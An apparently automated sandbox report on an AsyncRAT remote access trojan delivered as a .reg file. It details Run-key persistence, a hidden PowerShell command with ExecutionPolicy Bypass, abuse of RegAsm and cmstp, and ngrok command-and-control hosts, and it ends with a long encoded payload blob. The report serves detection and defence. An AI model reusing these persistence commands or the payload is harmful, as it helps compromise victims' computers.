Malware Analysis Report

2025-06-16 00:47

Sample ID: 241107-1xq5esymaz
Target: GWAesWUtovxi.reg
SHA256: 92148c6f69a95bed4abcd9efb43b89f0bd7287b4f418583f0008771c72699386
Tags: persistence asyncrat default defense_evasion discovery execution privilege_escalation rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 92148c6f69a95bed4abcd9efb43b89f0bd7287b4f418583f0008771c72699386

Threat Level: Known bad

The file GWAesWUtovxi.reg was found to be: Known bad.

Malicious Activity Summary

persistence asyncrat default defense_evasion discovery execution privilege_escalation rat

Asyncrat family

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

System Binary Proxy Execution: Regsvcs/Regasm

Blocklisted process makes network request

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Runs .reg file with regedit

Suspicious behavior: EnumeratesProcesses

Runs regedit.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies registry class

Kills process with taskkill

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-07 22:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-07 22:02
Reported: 2024-11-07 22:04
Platform: win7-20240708-en
Max time kernel: 117s
Max time network: 118s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Signatures

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand elided]" | C:\Windows\regedit.exe | N/A

Runs .reg file with regedit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Network

N/A

Files

memory/1908-0-0x0000000000160000-0x0000000000161000-memory.dmp

memory/1908-1-0x0000000000160000-0x0000000000161000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-07 22:02
Reported: 2024-11-07 22:04
Platform: win10v2004-20241007-en
Max time kernel: 148s
Max time network: 145s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

System Binary Proxy Execution: Regsvcs/Regasm

defense_evasion
Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand elided]" | C:\Windows\regedit.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | empty.ngrok.io | N/A | N/A
N/A | empty.ngrok.io | N/A | N/A
N/A | 4.tcp.eu.ngrok.io | N/A | N/A
N/A | 4.tcp.eu.ngrok.io | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\regedit.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\regedit.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A

Runs .reg file with regedit

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A

Runs regedit.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (9 identical rows)
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A (55 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (4 identical rows)
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A
Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A (58 identical rows)

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A (58 identical rows)

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3740 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3740 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 2204 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 2204 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2236 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2204 wrote to memory of 2236 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2236 wrote to memory of 3968 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2236 wrote to memory of 3968 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2204 wrote to memory of 2364 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\windows\system32\cmstp.exe
PID 2204 wrote to memory of 2364 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\windows\system32\cmstp.exe
PID 4592 wrote to memory of 3660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 4592 wrote to memory of 3660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
PID 4592 wrote to memory of 3660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\GWAesWUtovxi.reg"

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 EncodedCommand elided]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand [base64 encodedCommand elided]
ZABhAGIANABBAFoARABvADgAVwB1AFkAWgBMAGkASgBkADcAcQBvAEEAdgBiADYAVgBvAFgAMgBWAHUAVgAyADgARgBsAHcARwBRAEQATwBVADcARwAvAFUAMABkAGUAUQBFAGYANABRAG8AOQBKAEoAOAB6AHMAMABuAHIAUwB0AG4AcgBrADQAdwBDAGkAaAA5AHoATgBtADYAcAB2AEQAcQBuAEwAdgB2AHIAKwBXAE4AdABFAHoASgBaAEEATAAvAHgAaQBpAFcAVgAvAFcAVgArAE4AYgBOAEQARwB0AEYAbABtAG4AWQBNAGQAQgBGAFUAWgBNAGoAYQBUAEUASgBFAHgASgBkAGcANgBhAFAAeABMAGYASABUAHgAVQB4AE0AWQAxAEQALwAzAHQAYgBTAGIAOQBXAFEAbwA3AFEAMwBoADAAegB2AEEASABFADQAMwA2AHkALwBSAEcAbgAwAEEALwB4AGcAYQBVAEEAWQBvAHMAMgAzAHUAVQAzAEYAWgBXAGwAcQBaADkARQBBAG0AOQBrAEwARABLAHAAaQBYAFoANwBtAEwANQBZAHEAZwBmADgATABZAHgAMAB1AFcAdQBJADAAYwA2ADIATABuADkARQBhAGsANQArAEEAUQBJAEsAQQBlAGcAQwBRAE4AawBPADUAUgArADMAKwA0ADIARwA5AEcAMQBiAFAATQBZAGYATQBzAHIAeABqAEQAOABnAEYANAAyACsANQBvAEoAOABkAEsARwBVADMASgAvAG4AawBqAE0AMABOAHgAQwBXAFIAQQB2AEQAMgA5AHkASgBTAHgAcwB4AHYAdAAxAEQAbgA2AE8AQwBNAFoAOQBnAHIAaABrAEsAcQBBAFYAKwArAE4AUwA3AGEAbQB5AGIAMwBQAHcAVQBoAFQAVgAzAFEAMQBwADMAYQBHADgAdQB2AHAAcAArACsAdQBYAGUASgBKAGgAagBuACsANABYAC8AdQBOADEASABBAEMAdAAxAFIAVAA5AGMAdABhADMAQgBxADAATABpADcAZwBGAHgAawBRAFoASgAzADUATwBuAEIAagA0AHkAZABLAE8AawBxAEwAZAB2AFkAcQBRAEIAYwBUAGUARgBsAGcAeQA4AGgAYQBLAEgAdQA4AE0AVABuAHIATABEADMAWABTAGsANAB3AFUAaQBmAGkAOQBGAHcAYQB5AGYATwA5AFMASgBUAHEAUQBmAHIANgBsAGoAVwArAEoAZwBUAHcAdQBFADIAaQBoAHMAZAB3AHcAMABXAGcAagB4AGIAeQBtAGcANABoAEwASABIAGoATwBrADUARgBMAFEAWAA0AFIASQBNAGMAbgBmADMAcQBMAE0AMABRAGkAMwBlAGgAagAzAEYATAB3AHYATABOAGQAbwBsAFIAVgBrAHcALwAxAE8AWQBNADAAQgBEAEkAYQA4AGEAbQBxAEoAawBLAGIAVQBoADEAagA3AEEAMwBZAEUAeABvAEgAYQBiAEwAdgBEAEoAagBNAGoAYwBGAEoANABHADgAdQBQAFEAVwBmAGIAcgB5AE0AKwBQAFgAeABRADMAUABCACsAQwAyAHEARwBTAEQASwB4AGMAcABDAEoAaAB1AHYASwBUAGwAWQBtAGoARwBNAHoAdQBoAGYAdgBmAFMAYwBHAEwAKwA4AFUAOABFAFAARgBaAFAANgBkAFMAUQBTAGoAcwBJAEEAbwBLADgAOAA4AEoAeAB6ADkANwBTAGsAUwB6AHoAUQBoAHIAZQAyADQAcwBQAGMAWQBTAHUAdgAvAFIAbgA4AEIAMwB0AHEAQwBOAEUASQBrAEIARAAxADcAQgB3ADIARgAzADUATQB2AE0AOQB2AFEAbgByAHAAUgBIAHQAaAA0AGYANQAwAGcAQQBEAHUATABBAEYAWABRAGcAUgAzAHgAdwA3AEMAdAA5AGsAcABGAGgAdgBPAFIATgA3ADkA
NgB6AHEAQQB4AGQAWQBSAFUAYQB2AHgAZwBSAC8AcABFAGgATABsAEMAdABFAE8AUAB6AEgAcAA4AEYARwBqAFgAeQBPAEkARwBNAGIANgBoAHAAeQBWAHgAWAB2AEEARABhADMAVwArAFQAZwBiACsAVQB0AFAANgA5AHEAVwBzADcANwBTAG8ASwBaAGQAagA0AEMAcwBJAEYAZwBvAFYATgBxAEUATAAyAEkAQgBlAHQAcQBUADYAeAArAG0AMwA1AFcARwBhAE4AMgBLAEsAKwBTAEgAYwBVAGwAagA3AEIAeABnAHUAWgBQAHcASwAvAHgATQA2AHAAYQAvAEYASwBDADkATwBHAGYAUABzAHgARgBrAHIANABIAGgAVAAyAG4AUQBMACsASQBBAE4AZABLAHkANABOAEEAMwBQAGEAcgBaAHMAMQB0AFkARQBHAHkAeABRADEAWABRAHIAYgA2ADMAcABBAEkAdABpAEsAeABMAGsARwBIAE4AVwBiADgAUgBBAEYAaQBmAGYAQQBqAFIAQwBwAFUAVwBIAGwAeQBGAGcAKwBOAFQATABXADgAZgBtAFcAMgBTADMAawBEAGcATgByAHYAMQBrAGMAMQBPAE0AOQBlAFAAaQBiAEkAdAB2AEkANQBwADgANwBVAGoAdwB3AE0AeQA4AGUAUQBrAEIASQBJAGEAbABQAHAATQBSADgAMwArAEUAVABLAG8ANgB6AFkASQBaAGQARABVAHEAZABtAEoAdwBCAGQAWgBnAHQARAAxADQAYgB2AEgAMAByAEQAOQB0AE4ASwA5AGMAaQAyADAAYwBEADgAMwBIAEsAQwBFAEEAQwAzADQALwBNAGgAOQBqAFQAVQBxADIARABkAEcAUQBqAHQAVQA5AFEANgBBAHcAcQBOADMAMAA3AFkAbwBlAFkAZgBBAHgAdgBjAGgANQBzADUAaABiAG8ANQBjAGIAVwBCAHMAdwBKAGgAYQBZAEcATgBCADgAKwBXADUATQBFAHIAMABTAFYANQBXADMASQBvADIANAB6AGsALwBlADEASQBYAHgANQAwAGQAeQBZAHEAUgBrADYAOQBXAEMASABMAFQAUABxAEcAWQBZAFgASABjAG8ANQBaAHQAaABtAFoAQwBoAHMAawA4AGEAcwAwAEsARQBtAHQASABqAGsARgBGAGkAVgBNAFAAMgBzAGwAbAA2AGEARwBuAFcATAByADQAdwBtAFIATAArAHcAUQBGAHkASwBJAGYAUABiAFMAcQAyAGwAYgBXAGkANwBBAE0ALwBZAEwAWQArAHAAWABXAFQAOABtADkAagB1AFkANABEAE4AbQBEAGgAZABBADAATwBQAHMAcgB2AHMANwAzAGcAZABWAHcASQBXAEEAeABiAE0ATwBIADQATgBqAGcAUwAvAEwAVwB5AEEAZgB4AEgAVQBzAHEAZABSAGEAeQBmAFcAbQBYAHEAMAA3AHcATgBZAGQAMgBXAGoAVwAvADQANQBzAG8AZwBUAHoAZABvAFgAVwBzAEkAbQB4ADEAdgBnAHQAUAA1AFYAbAB3AGMAcwBCAFEATgArADQAawBBAFMAbQA5AFoAWAAvAEcAOQBmADYAUgBGAFQAVAB3ADQAQQBLAGYASwBZAHYAaQBGAEIAWgBEAEwAeAA5AHoAVABiAFcAcwBLAEEASABNAEMAcABVAHIAcwBPAFIAUAAvAGoAWQBaAEwAeQBLAHYAQgA4AHoANQBwAHUAdQBVAEwASABQAGwAZQBkAFgAdwA1AGoAbABQADkAawB5AEMAYgBmAFUAegA0AEMAWgBUAEIAaABzAFkAbQArAHgATAB6AHMAZwByAEcAdwB1AE0AWQBzADEAZgBYAGUANAB1ADQAdAA5AFEAUwBCAFIARABWAEYAcwBEAHAASABKAGoAYwBSAHQANQBaADYASQA0ADgALwBiAGQASwB6AHAAcQA1AHkA
VwBDADMAeABrAEcAbgBLAGwAaABjADYAcgB1AEQANwB5AGgAeQBRAE0AUwBqAHgAVwBiADQAQgB3AGcARAAzADMALwBlADcAbABuAHIAUQA2AEEAcwAxADAAdgBBAFMAYwBMAFUAVgBQADcAYgA0AEUAUgBHAHAAcgBvAG0AQgBWAGkAZgBLADkAaAB5AGgATQBlAE0AYQBFADkAdQBCAHkATwBxAEMAQQBXAE8AcABTAGwAdQB5AFgAcwAwAE0AWgBRAG0AcgBhAGUASgBXADYAbwAvAGsAUABTAFgASgBVAGIASgBwAFUAagBzADMAUAAzAG8AbABuAG4ANgBOAEQAeAAvAEgAWABJAHoAagAzAG8AZQBUAFEAawBzADgALwBlAE0AVwBkAFUANABYAFAATwBwAHgARwBrAG0AZAB5ADYAbwAxAGMAZgBrAGkAVgArAHoANABmAFkAMAAvAEUAagBSAFAAKwBhAFoAdwA0AFYAeQBpAEwAUgA0AHEAWQA5AFQAVAAyAHoAbgBmAGsAdwBhAHUAMgAzAHQAQgBCAHQAbQBwAEQAdAA3ADUALwBwAGQAOQBnAEYARgBpADcANABFAEQAeAA5AHAAMQBuADgAbgBMAFgASgBOAE0AbABoADgAWABqAHEAaAA4AFAAQgBFAHgATgBzAHkARwBSAEQAegAvAFEATQBCAG8ANAB0AE4AcQA3AG8AZABIAFMAeAAwAHkAeABDAEIAcQBDAEUAegBOAGcAcQBEADcAdwBoADgAegArAFgAOQBwAHkAegBFACsATwBGAFkASQBOAEcARwBRAG8AaQByAFcAYwBZAGsAaQA3AHMAUAB5AHUATQB5AFkAUgArADIAUgBnAGcAUgBRACsAcgBzAE4AWgBXAGYAegAwAE0AagBjAEMAbABDAEsAWAByAEQAVwBZAHEALwBjADEAYQBUAHcAYQBQAGUAYwB5ADAARwBrAEkAdABMADIAZgBnAHkAVgBwAG4AQQBVAHUASwAyAHEANAArAFIAeABYAG0AYwBDAE4AcgBLAEQAWgA2AFkASQB4AGoAWgA4AGwASABqAFkAbgB1AEwAZQBUAEIANABwAGwAaABjAEMAYQBUAG8AeQBJAHMANwB3ADgAYQBqAEgAegBhAHAAMwBUAGgAcQBVAEgATgBxADEAdgBDAE0ASABNAG8ASgBYADEAZQBRAHcARgBGADIAZABvAFoAdgBGAE4ATQA4AG4ARQBwAHoAMQBaAEUAKwBjADYAVwBGAHAAdABiADgASgA1AFUASQBsAGoAWgAwAGIASwAxAEoAMABVAHoATABqAFAAKwB2AEMAZQBnAFcAYgBFAEwAMQBZAGIAeQBtADMAbwAxADcAUwA0AEMAVwB1ADEAaQB1AHIAZgBEAFoAaQAvAHEATgA4AG8AdQBIAE4AbQA5AEEALwBFAG0ANQAwADgAcwBQAHQAVAByAGcANQBaAFoARgB5AEsAKwArAGkAQgBBAEcAdgBTAE4ATgBEAFYARgBNAE0AWABJAE0AcABwAEwAcAB2ACsAeQBvAGQAMgAvADUAQQBmAGsASwBOADYATQB0AEkAZgAwAGcAUgBXAFIATQArAFEAOABmAHIAUwBFAHIAKwB3AE4AaABPAG0AMQBCAHUAdgBHAEgAdAA4AEEAYgBnAFAAdABKAEsASgBOAEYAawBxADMASABIAGUAcwB5AFEAZAB3AFMARwBRADgAVABvAFcANABKADIAaQAxACsAcABqAFAAcgBmAGgATgBPAG8AUgBXAEsANAA4AEIAVwBnAG4AdwBTAEIAUABnAE8AcgBaAHgARAA0AHMAdwAyACsATgBTAFoAMgBrAHIAZQBkAGcAOAB3AE8AQwBsAEcANgB3AEsAbAA3ACsAMwBxAGYAKwB1AC8AVAA5AFIARABNAGYAaABTAHoAZgA1AHIAUQBHADMASQBUAGcAVgBiAGwAeABuAE4AeABiADMA
OQBZAHUAYwBkAEYAUABHAE4AVQB5AGsAYgAzAGoAVwBqAGIAbABRAEwAZABXADMAQQBjAHoAZwBhADgAeQBYACsAUAAzAHAAQgBCAEYAMQA3AHcAVABCAG0AcABhACsANABsAFkAcQBmAE8AUQBBAGwAcABTAFgAQgBYAEgAcAAzAEkAUgBsAFYAUwBTADUAeQB1ADAAOABoAEQAaABRAHUARAA0AG0AYgBUAG4AZAArADcAUABIADUATAAyADcARQArAFkAMQBtAFoAVQB4AEQAMwA4AEMAdABQAGgANgByAEoAZABOAE0ASQBiAG0AVQBLAFMAaQA4AGMANQBpAEwAQwBOAG4AUwAvADQAdQArAHUAUQB0AGEAVABGAEMAWgA0ADIAVABZAEgARgBvAGoAaQArAEcAMABMAFQARQBUAFEAQwBqADcAaAA0AG0AdgBQAEsAUwBIAGYAWABGADMAdABUAFkAUwBtAGQARABUAEsATQB1AE4ANgBwAGQASQAvAGoAWABRAGoAWQBRAE8AZgBpAHQAQgAyAEgARwBJAEMANQA4AFEAaQAxAHkANwBmAG8AWQAyACsARgBiAHcAcgB5ADUATQBXADQAWQBWAGcAeQBCAHYAZwBJAFUAWABGAFEAZgBQAHoAdQA1AGsAZwBBAE4AaQBBACsAMQA0AHQAMABoAGoAVABnAGkARwBCAEIANwBTAHAAYgB4AEgAUgBFAFkAMQBUAHMAUABVAGYAMgBmAFoAawBtAHQAOQBaAFMARgArAEsAUAB4AEQAawBEAEEAVwBuACsALwBnADkAVgB4AGQAbwBCAGIAcABtAE4AUQBrADIAWQByAEIAZQA4ADgAWQA5AGgAdgBrAG4AZwBsAFcAeQBSAFkATgArAGgAcQA5AHUANwBBAHkAeQBWAFIAbgAwAEQAYgA0AEkAdgBIADkALwBvAEMAeQB2ADgAZABQAG4AVQAxAG0ARQB3AHEARABnAEYAMwAxAEoAWABGAHIAcgBHAEkAMQBnAFUAYQBiAGEAegBLAGEAZQAwAGIALwBrADcAcABZAEYAQQBPAHQAQwBjAGcAcQB6AHgASgBqAFoAZQAxACsAMAB3AGEASAA2AEkATgBFAEQAagA0ADAARwBOAGoAeQByAFUARwBqAHoAcwBUAHQAcQBYAGsAdQBsAHUALwBGAEoAKwArAGEAVABOAGgAUABxAEIAOQA3AEEAbgA4AFoANgBDADUASQBrAG8AdwBlAGwARQBxADkANABtAEoAZgB2ADMAVwBTADYATQBkAC8ARABVAHMAawBSAHcAZABVAGgAcABsAHEASQB5AC8AbwBxAEUAVABnAG0ASwAvAG4ARABCAHgAZgBRAHcAeABsAEcARwBjAHEAQgA2AGYAZABEAEUAcQBaADUAVQB4AHkAZQBiAEoAZQBSAHcAcQBWAHUAWQAxAFoAQQBGAFcAdQB3AHoAbQBBAFgAcQBUAEgAVwA2AEwAYwArAG0AVwBuAFcAcQA5AHMAbABlAHMAaQBJADkAMgBMADcAagBtAGwAKwBsAEUAdABVADgAZwBPAC8AdAB6AFYAUAB1ADYAYgBjAHQALwBZAG4AaQBmAFcANABOAC8AZAB0AGoAZgArADYAKwBxAHAASQBpACsAbABlAGcAKwBjAGgAMQB1AHAAZgBWAHEASABxAHoANABaAGQAZQAvAHAAKwBnAFIAegBXAEsAbABNAHgAdABlAHAAZgB1AGkAYQBZAGoAUwB6AEMASABxAFYAdwBKAEIAOQBMAHMAVQArAGMAYQB5AGUAYwBNAHMAOAB5AHMAMQAxAEMANQBuAEMAVABUAEYAYgBUAHYASwBTADkAWQBwAE0AVwB5AFgAdABuACsAKwBGAFIAMQBzAFEAUgBoAGsAMwBCAEQANQA3AEIAbwBQADcARgBSAFMANQB6ADMASABpAHIAMAB3AGcANgBoAGsAYQBNAFcARAArACsA
cgBTAG4AVwBpAG0AegA3ADcARwBHAHkAZgBEAGwAbQBzAHMAUQBZAGgATABxADUARgBiAHgAVgAxAFcAZQB4AGQANQBXAHMARgBTAGQAcABwAHkANABnADcAYwBjAGsAdwBBAGIAUwBkADgAMgAyAFkAbABoAG4ARwBaAHYAUQBLAHQAMABwADgANQBrAFoAYwBXAGsAMwBkAFAAbgBUAHQAbAByADcASABKAGUASgBYAHYANwB6AGkAbwA3AGIAMQA2AGkAaAByADUAegBUAHYAVgBtAFIAKwA4AGoAMQBnAEYAZABXADUAMwA0AGcAegBqAHUAMQBLAHAAbgBuADQASwBWAHUAUgBRADQAbQByAGYASgBnAFQAKwByAEsAOABsAEgAcABrAG4ATQBjAGsANQBOAHgAVgA5AEwAKwBrAHQAdQBrAHQAMwB1AEEAawBVAE0AYQB1AGYAcgBxAE0ARwArAFEAaQB1AE0AcwBEAGoAOABVAFMAZwBJAHoAcwBaADEANQBDAHkAeABUAGcAagBRADEAVwBDAFgARABUAHMAMABwAHkAagB2AGYAVQBkAE8AZQBvAGwAbAB1AE8ANgBBAHIATAAwAEYAOQBWAEcAdQBiAGgASwA5ADQAagBtADgANQBvAE4AMABMAGMAbQByAGEAZwA5AEgAZQB2AFMAZwBxADYAYgAzAG4ASgBqAGsASgBhAHgALwBnADIAZgBSAEwATQBjAEwAdQBQAG4AVQBqADMARwBuADAASQBXAFgAbwBvAHgAOQBWAFUAcQB2AGYAZwBBAE0ATwAxAE4AQQBPAGEARAB4AG0ANgBIAHEAOQBlAEoANwA4ACsAaQBaAHIAOQBSAFIATwA4AFQATQAzAG0ANgA5ADgAawBUAFgAbQBwADgAZQBOAFAAVwAyAGwAeAA2AG8ARABBAFEASwBGAEwATABHAEwAdQAvAEEAZQBWAFIAagBHAEIAaQBGAEcAUABYAGwAQgBGAGcANwBNADQALwB6AGQAYgBUAE8AdgBNAGEAMQBnAHAAaABOAHAAcABsAGYASABmAGkAdgBOAFIAeAA3AFYAdwBNAHMAKwAwADgAZgBRAG0AegBMAGgAOABoAEMASABTAHoAZABEAHMAawAvAHcAdgBlAEEARABqAHIAaQBYADcAZgBkAEUAdwBxAEwAUABvADIAMgBvAFUAOAB4ADIAbABOAC8ASABMADYARgBrAGUAdQA0AHkAWQB4AEcAcgArADUAOAB5AFYASQBxAEYAcwByADAANAArAGMATgA3AHIAMQBhACsANQBBAG4AaQB5AHcAWgB5AGcAZAA0AHMAMgBKAFQAdQB5AC8AMgB3AFcAYgBOAFEATwA0AHEAcAB6AHQAWgBWADgAdgAvAGoAagAyADAAegBmAHoARABjAFEAagArAGMANgB0ADgAdwB3ADAAUQBTAGoATQBMAG8AbABPAG4AUgArADkAMQBiAFYAdQBvAG8AYQBxAHAAWQAxAE0ATAB6AFIAbABsAFEATABvADUARgBaAHYAZwBIADIATAB4AFoAQwBHAEkAMQBRAHMARABuAGgATABGAEMALwAwAE8AWABnAE0AKwBtADMAeABuAHAANgBMAEsAYQBTADAASABzADgARQBCAGwANABLAHkATQBLAEsANwBwADgAbgBtAGwAWABFAHAAKwA2AFMAdwBtAHcAZwBsADIAQQBDAEYAYgBEADgAUgBKAEYAaQA4AG8AdgBuAEQAKwBOAHIAMQBMAGwASwBmAFoARAAvACsAZwA2AHUATQBKAGcAYQBXAHIAKwBPAHgAVAAvAG8ARABGAGMAMwBLAHUASAByAGcALwA1AHAAdQBWAFcAUAB2AGQAMwBmAGsAUwA0AE8ANgBnAC8AUgBXADIAVgB2AGcAYgBhAHgAbgBOAFQAegB0AGwAMwBPAHQAZgBsAHkASgBZAFIAQwBaAEUATABQAFkALwBIAE4A
